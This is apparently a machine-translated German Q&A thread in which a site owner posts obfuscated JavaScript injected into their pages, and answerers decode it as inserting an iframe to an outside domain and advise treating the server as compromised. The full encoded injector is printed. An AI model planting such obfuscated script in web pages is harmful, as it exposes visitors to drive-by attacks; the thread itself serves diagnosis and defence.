1. Zuhause
  2. Frage und Antwort
  3. Javascript "Virus"

Javascript "Virus"

2009-04-06 3 views
3

Ich habe ein Problem mit einigen JS "Virus" auf allen meinen Websites. Sie sind auf verschiedenen Hostings und auf einigen von ihnen erscheint dieser Code.Javascript "Virus"

<script> 
function c2670903e0i49d9f1a845f6b(i49d9f1a846377) { 
    var i49d9f1a846737 = 16; 
    return (parseInt(i49d9f1a846377, i49d9f1a846737)); 
} 
function i49d9f1a8472f3(i49d9f1a8476d9) { 
    var i49d9f1a848679 = 2; 
    var i49d9f1a847da9 = ''; 
    i49d9f1a848e47 = String.fromCharCode; 
    for (i49d9f1a84828e = 0; i49d9f1a84828e < i49d9f1a8476d9.length; i49d9f1a84828e += i49d9f1a848679) { 
     i49d9f1a847da9 += (i49d9f1a848e47(c2670903e0i49d9f1a845f6b(i49d9f1a8476d9.substr(i49d9f1a84828e, i49d9f1a848679)))); 
    } 
    return i49d9f1a847da9; 
} 
var r1a = ''; 
var i49d9f1a84922e = '3C7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a +'43E696628216D7' + r1a + '96961297' + r1a + 'B646F637' + r1a + '56D656E7' + r1a + '42E7' + r1a + '7' + r1a + '7' + r1a + '2697' + r1a + '465287' + r1a + '56E657' + r1a + '363617' + r1a + '065282027' + r1a + '2533632536392536362537' + r1a + '322536312536642536352532302536652536312536642536352533642536332533322533362532302537' + r1a + '332537' + r1a + '32253633253364253237' + r1a + '2536382537' + r1a + '342537' + r1a + '342537' + r1a + '302533612532662532662536352536332536662536642532652537' + r1a + '322536312537' + r1a + '322536352536322537' + r1a + '322536352536352536342536362536662536662537' + r1a + '342537' + r1a + '37' + r1a + '2536352536312537' + r1a + '32253265253633253666253664253266253366253237' + r1a + '2532622534642536312537' + r1a + '342536382532652537' + r1a + '322536662537' + r1a + '352536652536342532382534642536312537' + r1a + '342536382532652537' + r1a + '32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237' + r1a + '253632253237' + r1a + '2532302537' + r1a + '37' + r1a + '2536392536342537' + r1a + '34253638253364253335253332253331253230253638253635253639253637' + r1a + '2536382537' + r1a + '342533642533342533382533342532302537' + r1a + '332537' + r1a + '342537' + r1a + '39253663253635253364253237' + r1a + '2537' + r1a + '362536392537' + r1a + '332536392536322536392536632536392537' + r1a + '342537' + r1a + '39253361253638253639253634253634253635253665253237' + r1a + '2533652533632532662536392536362537' + r1a + '3225363125366425363525336527' + r1a + '29293B7' + r1a + 'D7' + r1a + '6617' + r1a + '2206D7' + r1a + '969613D7' + r1a + '47' + r1a + '27' + r1a + '5653B3C2F7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a + '43E'; 
document.write(i49d9f1a8472f3(i49d9f1a84922e)); 
</script>

NOD32 blockiert die Website, weil er glaubt, dass es ein Virus ist. Das Löschen des Quellcodes ist nicht hilfreich, da er erneut angezeigt wird. Es kann nicht Ergebnis von XSS sein, weil es sogar auf statischen Webseiten erscheint.

Ich habe versucht, mein System vollständig zu scannen und es hat nicht geholfen. Das einzige, was auf allen Websites ist, ist Google Analytics, was meiner Meinung nach nicht dazu führen kann.

bearbeiten: Sie können es zum Beispiel unter http://www.postuj.cz/test/ oder unter http://flavicius.php5.cz/ sehen.

Quelle

2009-04-06 Jakub Arnold

+0

Sind Sie sicher, dass es nicht von einem Browser-Plugin erstellt wird? Was passiert, wenn jemand Ihre Website durchsucht? –

+0

Andere Leute können es auch sehen, so habe ich es herausgefunden, ein Freund von mir hat mir gesagt, dass NOD32 dort einen Virus gefunden hat. –

Antwort

7

Sie sind auf verschiedenen Hostings, und auf einigen von ihnen erscheint dieser Code.

Ist der Code auf jedem Host gleich? Können Sie ein Beispiel für eine der betroffenen Domänen angeben, damit wir überprüfen können, ob der Code auf der Serverseite und nicht nur auf Ihrem Computer vorhanden ist (was normalerweise sehr unwahrscheinlich ist).

Der Code, den Sie gepostet haben, ist sicherlich sehr verdächtig. Nach der Dekodierung schreibt es einen iframe an http: // ecom.rarrefreedfootwear.com/? (es versucht, der URL eine Cachebuster-Zufallszahl hinzuzufügen, scheitert jedoch aufgrund eines Tippfehlers).

Es gibt nichts offensichtlich Exploit bei dieser Adresse - vielleicht wurde der finale Ziel-Exploit noch nicht implementiert, oder es ist nur ein Testlauf für einen echten Angriff später, aber ein unerwartetes JavaScript auf Ihrer Website, das sich selbst dekodiert und fügt ein iframe ist eine riesige rote Fahne. Normalerweise bedeutet dies, dass Ihr Server kompromittiert wurde und neu mit neuen Kennwörtern neu installiert werden muss.

ETA:

Sie es zum Beispiel bei hxxp sehen: //flavicius.php5.cz/

Dank. Ich habe den Kommentar gelöscht, um die funktionierende URL zu verbergen, weil sie tatsächlich infiziert ist. Ob auf einer Anwendungsebene oder Apache selbst ist nicht klar, aber jede Seite hat das verdächtige Skript am unteren Rand.

Also zumindest die Anwendung und möglicherweise der Server ist kompromittiert und sollte für die Reinigung, Neuinstallation und Diagnose offline genommen werden: Sie müssen herausfinden, wie die Angreifer reingekommen sind, damit es nicht wieder passiert. Als erste Vermutung, überprüfen Sie, dass Sie die neueste Version von WordPress haben, da es in der Vergangenheit viele Sicherheitslücken hatte.

Quelle

2009-04-06 17:05:01 bobince

+0

Sie können ** KyplexAV ** verwenden, um infizierte Seiten in Ihrem Wordpress-Blog zu erkennen. Es ist kostenlos. – maozet

7

Es sieht aus wie Vundo oder eine Variante davon. Diese Malware hat die Tendenz, scheinbar bedeutungsloses JavaScript in Websites einzufügen (am Ende, nicht auf der Serverseite). Ich würde vorschlagen, versuchen Malwarebytes' Anti-Malware. Installieren Sie es, aktualisieren Sie es und führen Sie einen vollständigen Scan durch. Wenn das fehlschlägt, versuchen Sie vielleicht, nach Möglichkeiten zum Entfernen von Vundo zu suchen.

Quelle

2009-04-06 14:46:51

Verwandte Themen

 Verwandte Themen